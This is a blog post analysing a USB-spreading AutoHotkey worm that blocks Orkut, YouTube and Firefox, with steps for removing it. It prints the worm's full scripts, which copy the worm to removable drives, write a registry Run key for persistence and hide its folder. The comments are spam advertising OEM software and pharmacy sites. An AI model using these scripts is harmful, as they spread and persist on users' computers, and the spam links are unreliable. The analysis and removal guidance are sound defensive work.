MUHAHAHA!!" Is appearing with a laughing sound."
what's this...and how can we removed this virus or worm......
so that here is the Full description of this malware.........
About this malware:
this is a new malware( and a funny one- i think some activist
programmed it ) which blocks the user from accessing youtube or
orkut......
it gives the alert "orkut\youtube is banned you fool" and closes the
window immediately,......
it also blocks the user from opening Firefox......
it gives the alert "use IE you dope" and closes the Firefox
window.....
it also plays a .wav file (which sounds as "muhahaha!!)
whenever the alerts pop-up.....
How to Remove:
Download first hijakthis from Trend Micro
Just Run it .. And it will display lots of processes which are running
in you system look for entries like this
1. heap41a\svchost.exe
2. heap41a\std.txt
Delete These entries ...
If you delete other svchost.exe the windows warning will be seen
and it will restart your system only........
After That Just Use search to search for "heap" tick
the hidden and system folder option then you will be able to see
a hidden folder named heap41a delete it.... If it says access denied
the download and install and use Unlocker.
from where this malware comes:
1]
from unwanted sites and ur removalble disk
2]
this malware jumps into your flash drive when plugged into infected.....
system and hides itself disguised as a folder......
I have PE Tools installed in my PC i ran to find out the running process. I went through all the process and found out that svchost.exe was the one responsible for it. Where PE tools helped me was, svchost.exe was running from a location C:\heap41a . So this is where the worm resides, hmm interesting now deleting the folder would do our task. But it was not so easy, as I terminated this process svchost.exe from the process list it would start again. So I had to boot my XP in safe mode. Why in safe mode is because in safe mode windows loads only the minimum required drivers and doesn’t load any user process, so this means the worm is not started with the windows. Now I searched the folder C:\heap41b but it was hidden. I went to Tools>folder option and select Show all files and folders and pressed ok. I refreshed the c:\ only to find that it won’t show any hidden folders. I again went to the Tools>folder and found the setting of Show all files and folders was reseted. Now how do I see the content, what I did was went to windows search and in advanced option I gave search hidden files and folders and gave svchost.exe as the search keyword. Bang it searched it, so I opened the folder to find out this file was not alone, the other files in this Folder were [offspring], 2.mp3, Icon.ico, reproduce.txt, svchost.exe, drivelist.txt, script1.txt, std.txt . Lets see the content of these text file.
[offspring] - Blank Folder
2.mp3 - A laughing sound
Icon.ico - A blank Icon file
reproduce.txt
#notrayicon
#persistent
ArrayCount = 0
Loop, Read,C:\heap41a\driveList.txt
{
ArrayCount += 1
Array%ArrayCount% := A_LoopReadLine
}
dat1=%userprofile%
settimer,reproduce,5000
return
reproduce:
Loop %ArrayCount%
{
element := Array%A_Index%
driveget,data,Type,%element%:\
ifequal,data,Removable
{
driveget,data1,status,%element%:\
ifequal,data1,Ready
{
FileCopydir,C:\heap41a\offspring,%element%:\,1
}
}
}
regread,regdata,REG_SZ,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\
CurrentVersion\policies\Explorer\Run,winlogon
ifnotequal,regdata,C:\heap41a\svchost.exe C:\heap41a\std.txt
Regwrite,REG_SZ,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\
CurrentVersion\policies\Explorer\Run,winlogon,C:\heap41a\svchost.exe C:\heap41a\std.txt
return
svchost.exe
This is the file that is the culprit. The file responsible for all the annoying pop ups
script1.txt
#persistent
#notrayicon
settimer,ban,2000
return
ban:
WinGetActiveTitle, ed
ifinstring,ed,orkut
{
winclose %ed%
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ifinstring,ed,youtube
{
winclose %ed%
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ifinstring,ed,Mozilla Firefox
{
winclose %ed%
msgbox,262160,USE INTERNET EXPLORER YOU DOPE,I DNT HATE MOZILLA BUT USE IE `r OR ELSE…,30
return
}
ifwinactive ahk_class IEFrame
{
ControlGetText,ed,edit1,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit2,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit3,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit4,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit1,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit2,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit3,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit4,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
}
return
std.txt
#notrayicon
#singleinstance,ignore
regread,regdata,REG_DWORD,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\
CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL,checkedvalue
ifnotequal,regdata,2
regwrite,REG_DWORD,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\
CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL,checkedvalue,2
Run C:\heap41a\svchost.exe C:\heap41a\script1.txt
Run C:\heap41a\svchost.exe C:\heap41a\reproduce.txt
These files gave away all that this worm does, after reading the script I found out that this worm also hates Youtube lol.. Most important information it gave was the Registery Keys it modified.
These are the keys that were responsible for the hidden folder problem I faced earlier
regread,regdata,REG_DWORD,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\
CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL,checkedvalue
ifnotequal,regdata,2
regwrite,REG_DWORD,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\
Explorer\Advanced\Folder\Hidden\SHOWALL,checkedvalue,2
Now to rectify this go to Start Menu>Run and type regedit . In the Registry Editor browse to this entry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\
CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL and in the “Checked all” key reset it back to 1 from 2. Now you can change the settings in the folders option. Now delete the folder C:\heap41a and clear all the key entries from this registry entry HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\
CurrentVersion\policies\Explorer\Run which says heap41a.
Now the virus infection is removed 100%. Before you are done make sure you format the usb drive it doesn’t infect other systems too.
6 comments:
free cissp ebook download http://audiobooksworld.co.uk/de/M-Dickinson/m78927/ ebook online store [url=http://audiobooksworld.co.uk/Tatyana-A-Haber/m123201/]desktop publishing ebook[/url] diesel ebook download free
[url=http://audiobooksworld.co.uk/Biographies-and-Memoirs/c1003/?page=38][img]http://audiobooksworld.co.uk/image/6.gif[/img][/url]
open source surveillance software for windows http://buyoemsoftware.co.uk/category-10/Internet?page=45 best inernet security software [url=http://buyoemsoftware.co.uk/product-19657/Dossier-2-3-Mac]dvd cd cover software[/url] sketching software for clothes
[url=http://buyoemsoftware.co.uk/product-37028/OO-DiskImage-Professional-6-0-x64]OO DiskImage Professional 6.0 x64 - Software Store[/url] biblical study software
[url=http://buyoemsoftware.co.uk/product-36590/Microsoft-Windows-7-Ultimate-x64-Italy][img]http://buyoem.co.uk/image/3.gif[/img][/url]
swedish antivirus software http://buyoemsoftware.co.uk/category-4/Software-Plugins?page=3 worm defense software [url=http://buyoemsoftware.co.uk/es/product-37188/ActiveState-Tcl-Dev-Kit-4-1-for-Windows]where to buy pc recruiter software[/url] gps network adjustment software
[url=http://buyoemsoftware.co.uk/category-100-108/Office-Tools]Office Tools - Software Store[/url] bird field guide software
[url=http://buyoemsoftware.co.uk/it/product-36583/Microsoft-Windows-7-Ultimate-x32-Italy][img]http://buyoem.co.uk/image/7.gif[/img][/url]
adium software http://buysoftwareonline.co.uk/fr/product-18484/SiSoftware-Sandra-Pro-Business-2009-1-1 palm car buying software [url=http://buysoftwareonline.co.uk/product-33404/Adobe-Premiere-Professional-CS5-MAC]surveillance webcam software[/url] palm v setup software
[url=http://buysoftwareonline.co.uk/product-36786/ActFax-4-2-x64]ActFax 4.2 x64 - Software Store[/url] pal to ntsc software convert
[url=http://buysoftwareonline.co.uk/product-35247/Joboshare-iPhone-iBooks-Transfer-3-0-MacOSX][img]http://buyoem.co.uk/image/4.gif[/img][/url]
math software for 1st 3rd grade http://buysoftwareonline.co.uk/category-100-111/System-Tools?page=3 dvd43 software digest megadownload [url=http://buysoftwareonline.co.uk/it/product-14086/MarsEdit-2-0-Mac]computer software reading[/url] wireless connection speed software
[url=http://buysoftwareonline.co.uk/category-8/Office-Tools?page=5]Office Tools - Cheap Legal OEM Software, Software Sale, Download OEM[/url] xandros 4 software repositories
[url=http://buysoftwareonline.co.uk/product-35960/Avid-Sibelius-7-0-x32][img]http://buyoem.co.uk/image/6.gif[/img][/url]
[url=http://englandpharmacy.co.uk/categories/anti-diabetic.htm][img]http://onlinemedistore.com/3.jpg[/img][/url]
k mart pharmacy http://englandpharmacy.co.uk/products/topamax.htm pharmacy techncian jobs [url=http://englandpharmacy.co.uk/products/kamagra.htm]medical marijuana pharmacy[/url]
suit law cvs pharmacy slip and fall http://englandpharmacy.co.uk/products/viagra-super-active-plus.htm walgreens chicago clark belden pharmacy phone [url=http://englandpharmacy.co.uk/products/mentax.htm]mentax[/url]
certified pharmacy technicican salaries http://englandpharmacy.co.uk/products/evista.htm propecia pharmacy approved [url=http://englandpharmacy.co.uk/products/prometrium.htm]discussion between doctor and pharmacy[/url]
how to report pharmacy rx stolen http://englandpharmacy.co.uk/products/minocycline.htm schrafts pharmacy [url=http://englandpharmacy.co.uk/products/viagra.htm]viagra[/url]
Post a Comment